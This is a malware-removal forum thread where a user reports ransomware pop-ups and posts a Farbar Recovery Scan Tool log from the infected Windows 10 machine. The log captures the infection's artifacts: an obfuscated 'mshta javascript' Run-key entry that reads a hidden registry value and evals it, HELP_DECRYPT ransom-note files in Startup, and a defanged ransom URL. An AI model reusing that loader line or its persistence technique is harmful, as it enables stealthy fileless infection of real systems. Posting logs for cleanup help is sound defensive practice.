Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Windows 10 viruses [Closed]

Started by turtle2953 , Oct 16 2015 10:01 PM

This topic is locked

#1
turtle2953

Posted 16 October 2015 - 10:01 PM

Member

Member
52 posts

I recently upgraded to Windows 10 and since I have had weird pop ups. I get a pop up screen telling me all my photos and files have been changed permanently. A note pad document opens telling me to download a random program to remove the encryption that has changed all my photos. I am getting constant windows defender alerts stating that a win32.trojan file has been detected. I have tried to remove it several times but no fix has happened yet. Please help.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:16-10-2015
Ran by christopher lane (administrator) on CHRISTOPHERLANE (16-10-2015 20:54:31)
Running from C:\Users\christopher lane\Desktop
Loaded Profiles: christopher lane & DefaultAppPool (Available Profiles: christopher lane & Guest & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 9 Organizer\PhotoshopElementsFileAgent.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Roxio) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowSvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(CyberLink) C:\Program Files (x86)\Cyberlink\YouCam\YCMMirage.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Facebook Inc.) C:\Users\christopher lane\AppData\Local\Facebook\Update\FacebookUpdate.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(PowerISO Computing, Inc.) C:\Program Files (x86)\PowerISO\PWRISOVM.EXE
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(DivX, LLC) C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
(Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(DivX, LLC) C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\Receiver\Receiver.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\w3wp.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\ielowutil.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1128448 2011-03-17] (IDT, Inc.)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll",TrayApp
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [497648 2010-09-16] (Adobe Systems Incorporated)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2417032 2011-08-01] (Microsoft Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3952800 2015-10-11] (Synaptics Incorporated)
HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113288 2010-11-17] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2015-06-26] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [283160 2011-01-12] (Intel Corporation)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2010-06-09] (Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60688 2015-09-15] (Apple Inc.)
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE [307200 2011-06-14] (PowerISO Computing, Inc.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-01-21] (Microsoft Corporation)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [578944 2012-03-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [358336 2011-08-11] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [448520 2015-06-24] (DivX, LLC)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2072928 2014-10-31] (Wondershare)
HKLM-x32\...\Run: [DelaypluginInstall] => C:\ProgramData\Wondershare\Video Converter Ultimate\DelayPluginI.exe
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [36710768 2015-10-01] (Dropbox, Inc.)
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1861640 2015-06-26] (DivX, LLC)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-03] (Advanced Micro Devices, Inc.)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Run: [Facebook Update] => C:\Users\christopher lane\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2012-07-11] (Facebook Inc.)
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Run: [Xvid] => C:\Program Files (x86)\Xvid\CheckUpdate.exe [8192 2011-01-17] ()
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2015-04-26] (Apple Inc.)
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2015-04-26] (Apple Inc.)
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Run: [AppleIEDAV] => C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe [1079592 2015-04-26] (Apple Inc.)
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [43816 2015-04-26] (Apple Inc.)
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Run: [**3a481ddf<*>] => mshta javascript:VlYJXEep7="T8Cu";D8x=new%20ActiveXObject("WScript.Shell");AgIrdfF0m2="h";p89Lfc=D8x.RegRead("HKCU\\software\\ea1aa6391a\\3e2c454b");oifU8dLk="F2qvU";eval(p89Lfc);VOGYg5TQ="IRLd5nFSS"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Policies\Explorer: [TaskbarNoNotification] 0
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-09-20] ()
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.27.dll [2015-10-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.27.dll [2015-10-01] (Dropbox, Inc.)
Startup: C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG [2015-10-14] ()
Startup: C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT [2015-10-14] ()
InternetURL: C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://ayh2m57ruxjtwyd5.speralreaopio.com/gj5hz1
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.25
Tcpip\..\Interfaces\{1bc23f43-8403-49b2-b292-add829da18c1}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{5334b3d2-ce98-4538-98f7-66ffa2847d48}: [DhcpNameServer] 192.168.0.1 205.171.2.25
Tcpip\..\Interfaces\{b70b1828-91d3-4474-8d75-a6731eaefdd7}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{da11d22f-42db-4eb7-a9b7-94a83a33e37b}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT/1
HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://search.conduit.com?SearchSource=10&ctid=CT3106777
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {BB82DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZLxdm003X9US&ptb=4zVlkGdB22iQ7Ly.Q20SrQ&ind=2011120921&ptnrS=ZLxdm003X9US&si=CJquq7vA9qwCFYUZQgodWBSCTQ&n=77df4519&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {BB82DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> DefaultScope {91CD3A72-6CE6-4B69-A09A-D944C36584B6} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {00C175EC-DD0C-4F1D-B35F-A9B33687C9D1} URL = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3106777
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D042215-ABA01A7CCEB2146F8A7F&form=CONBDF&conlogo=CT3330961&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZLxdm003X9US&ptb=4zVlkGdB22iQ7Ly.Q20SrQ&ind=2011120921&ptnrS=ZLxdm003X9US&si=CJquq7vA9qwCFYUZQgodWBSCTQ&n=77df4519&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = hxxp://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20111209&iesrc={referrer:source}
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {7F3A2942-97B7-4B56-8A97-E27D0835A2C8} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ANT&o=102821&src=kw&q={searchTerms}&locale=en_US&apn_ptnrs=4N&apn_dtid=YYYYYYSNUS&apn_uid=2267b6ae-c106-43fb-b375-48fbc6d4b7ae&apn_sauid=BFB5573C-50EB-40B2-A331-C4D1F36EEBA5&
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {91CD3A72-6CE6-4B69-A09A-D944C36584B6} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=UTF-8&fr=w3i&type=W3i_DS,136,0_0,Search,20150206,20028,0,31,0
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {BB82DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://websearch.searchtotal.info/?l=1&q={searchTerms}&pid=24423&r=2015/05/28&hid=5027782828486197179&lg=EN&cc=US&unqvl=88
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {CD1105A4-F86F-48E6-B6A9-67694343E2F6} URL = hxxp://searchou.com/?q={searchTerms}&id=0afce1ea0000000000002c413808d294&r=255
SearchScopes: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> No Name - {50FAFAF0-70A9-419D-A109-FA4B4FFD4E37} - No File
Toolbar: HKU\S-1-5-21-2813116197-4237973809-2954861823-1001 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://access.tmcaz.com/dana-cached/sc/JuniperSetupClient.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgpp.dll No File
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2011-08-11] (Citrix Systems, Inc.)

FireFox:
========
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2014-05-22] (DivX, LLC.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
